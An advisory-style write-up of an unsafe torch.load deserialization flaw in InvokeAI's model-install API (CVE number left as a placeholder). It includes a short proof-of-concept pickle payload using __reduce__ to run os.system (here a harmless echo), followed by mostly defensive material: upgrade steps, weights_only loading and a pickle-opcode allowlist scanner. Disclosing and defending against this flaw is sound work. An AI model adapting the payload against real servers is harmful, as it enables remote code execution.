InvokeAI, Deserialization of Untrusted Data, CVE-2025-XXXX (Critical)

How the CVE Works:

The vulnerability in InvokeAI (CVE-2025-XXXX) stems from the unsafe deserialization of untrusted data in versions 5.3.1 through 5.4.2. The `/api/v2/models/install` API endpoint uses `torch.load` to deserialize model files without proper validation. Attackers can craft malicious model files containing arbitrary code, which is executed upon deserialization. This allows remote code execution (RCE) on the target system. The issue is resolved in version 5.4.3 by implementing proper validation and secure deserialization practices.

DailyCVE Form:

Platform: InvokeAI
Version: 5.3.1 – 5.4.2
Vulnerability: Remote Code Execution
Severity: Critical
Date: Mar 21, 2025

What Undercode Says:

Exploitation:

  1. Crafting Malicious Payload: Attackers can create a malicious model file using PyTorch’s serialization (torch.save) to embed arbitrary code.
    import torch
    import os

    class Malicious:
        # __reduce__ tells pickle how to rebuild the object: a callable plus its
        # arguments, which the unpickler calls when the file is loaded
        def __reduce__(self):
            return (os.system, ('echo "Exploited!"',))

    payload = Malicious()
    torch.save(payload, 'malicious_model.pt')
    
  2. Delivering Payload: The malicious file is uploaded to the target system via the `/api/v2/models/install` endpoint.
  3. Triggering Exploit: When the model is loaded using torch.load, the embedded code is executed.

Protection:

  1. Update: Upgrade to InvokeAI version 5.4.3 or later.
  2. Input Validation: Validate and sanitize all model files before deserialization.
  3. Sandboxing: Use a sandboxed environment to load and execute untrusted models.
  4. Monitoring: Monitor API endpoints for unusual activity or unexpected file uploads.

Commands:

  • Check Version: Verify the installed version of InvokeAI.
    invokeai --version
    
  • Upgrade: Update to the patched version.
    pip install --upgrade invokeai
    

Code Example for Secure Deserialization:

    import torch

    def safe_load_model(file_path):
        with open(file_path, 'rb') as f:
            data = f.read()
        # Validate file signature or metadata before any unpickler sees the file.
        # is_trusted is the deployment's own check (for example a hash allowlist)
        # and is not defined here.
        if not is_trusted(data):
            raise ValueError("Untrusted model file")
        # weights_only=True restricts the unpickler to tensors and primitive
        # containers instead of arbitrary objects
        return torch.load(file_path, weights_only=True)
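The `is_trusted` check above is left open, and the "Input Validation" step under Protection says to validate model files before deserialization. The following is an added example, not InvokeAI's code or part of the original advisory, of one way to do that: walk the pickle opcodes inside a checkpoint with `pickletools` (which never executes anything) and refuse the file if it references any global outside an allowlist. This is the same idea as `torch.load(weights_only=True)`, done before the file reaches any unpickler. Assumptions: `ALLOWED_GLOBALS` is an illustrative subset of what a plain state_dict needs, the function names are the author's own, and the three sample streams are constructed inline for the demo.

```python
import io
import pickle
import pickletools
import zipfile
from collections import OrderedDict

# Illustrative allowlist (assumption): the handful of globals a plain state_dict
# checkpoint needs. Extend it per model format; anything not listed is refused.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
    ("torch._utils", "_rebuild_tensor_v2"),
    ("torch", "FloatStorage"),
    ("torch", "HalfStorage"),
    ("torch", "BFloat16Storage"),
}

# Opcodes that push a string onto the unpickler stack
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def referenced_globals(stream):
    """List every (module, name) a pickle stream imports, without executing it.

    GLOBAL carries "module name" inline. STACK_GLOBAL (protocol 4+) takes the two
    most recently pushed strings, so we track string pushes and the memo table
    instead of running the unpickler.
    """
    found = []
    strings = []          # strings pushed so far, newest last
    memo = {}             # memo slot -> string (None for non-string values)
    prev_was_string = False
    for op, arg, pos in pickletools.genops(stream):
        name = op.name
        if name == "GLOBAL":
            module, qualname = arg.split(" ", 1)
            found.append((module, qualname))
        elif name in STRING_OPS:
            strings.append(arg)
        elif name == "MEMOIZE":
            memo[len(memo)] = strings[-1] if prev_was_string else None
        elif name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = strings[-1] if prev_was_string else None
        elif name in ("GET", "BINGET", "LONG_BINGET"):
            value = memo.get(arg)
            if isinstance(value, str):
                strings.append(value)
        elif name == "STACK_GLOBAL":
            if len(strings) < 2:
                raise ValueError("malformed STACK_GLOBAL at offset %d" % pos)
            found.append((strings[-2], strings[-1]))
        prev_was_string = name in STRING_OPS
    return found


def scan_checkpoint(data, allowed=ALLOWED_GLOBALS):
    """Return the globals a checkpoint references that are not allowlisted.

    Accepts a raw pickle stream or the zip container torch.save writes, where
    the object graph lives in one or more *.pkl members. Empty result == clean.
    """
    buf = io.BytesIO(data)
    if zipfile.is_zipfile(buf):
        with zipfile.ZipFile(buf) as zf:
            streams = [zf.read(i) for i in zf.infolist() if i.filename.endswith(".pkl")]
        if not streams:
            raise ValueError("zip container has no pickle member")
    else:
        streams = [data]
    return [ref for s in streams for ref in referenced_globals(s) if ref not in allowed]


def assert_checkpoint_clean(data):
    """Raise before loading if the checkpoint references anything outside the allowlist."""
    bad = scan_checkpoint(data)
    if bad:
        raise ValueError("refusing checkpoint; disallowed globals: "
                         + ", ".join("%s.%s" % ref for ref in bad))


def build_zip_container(pickle_stream):
    """Wrap a pickle stream the way torch.save lays out its zip (constructed for the demo)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("archive/data.pkl", pickle_stream)
        zf.writestr("archive/version", "3\n")
    return buf.getvalue()


# Constructed samples. Scanning never unpickles, so none of them runs anything.
CLEAN_STATE_DICT = pickle.dumps(OrderedDict([("layer.weight", [0.1, 0.2])]), protocol=4)
# A protocol-0 stream whose only content is a GLOBAL reference to os.system (no REDUCE call).
GLOBAL_REF = b"cos\nsystem\n."
# The same reference as protocol 4 emits it: two SHORT_BINUNICODE strings, then STACK_GLOBAL.
STACK_GLOBAL_REF = b"\x80\x04\x8c\x02os\x8c\x06system\x93."

if __name__ == "__main__":
    print(scan_checkpoint(CLEAN_STATE_DICT))                       # []
    print(scan_checkpoint(GLOBAL_REF))                             # [('os', 'system')]
    print(scan_checkpoint(build_zip_container(STACK_GLOBAL_REF)))  # [('os', 'system')]
```

Run `assert_checkpoint_clean(open(path, "rb").read())` on an uploaded file before handing it to any loader. The allowlist is deliberately small: a rejected checkpoint that only needs an extra, known-safe rebuild helper is a far cheaper failure than a loader that accepts arbitrary callables.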

Analytics:

  • Impact: Critical (RCE)
  • Attack Vector: Remote
  • Complexity: Low
  • CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

References:

Reported By: https://github.com/advisories/GHSA-mcrp-whpw-jp68